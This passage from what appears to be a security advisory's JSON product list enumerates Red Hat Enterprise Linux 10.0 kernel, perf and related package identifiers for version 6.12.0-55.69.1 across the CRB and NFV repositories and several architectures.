"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
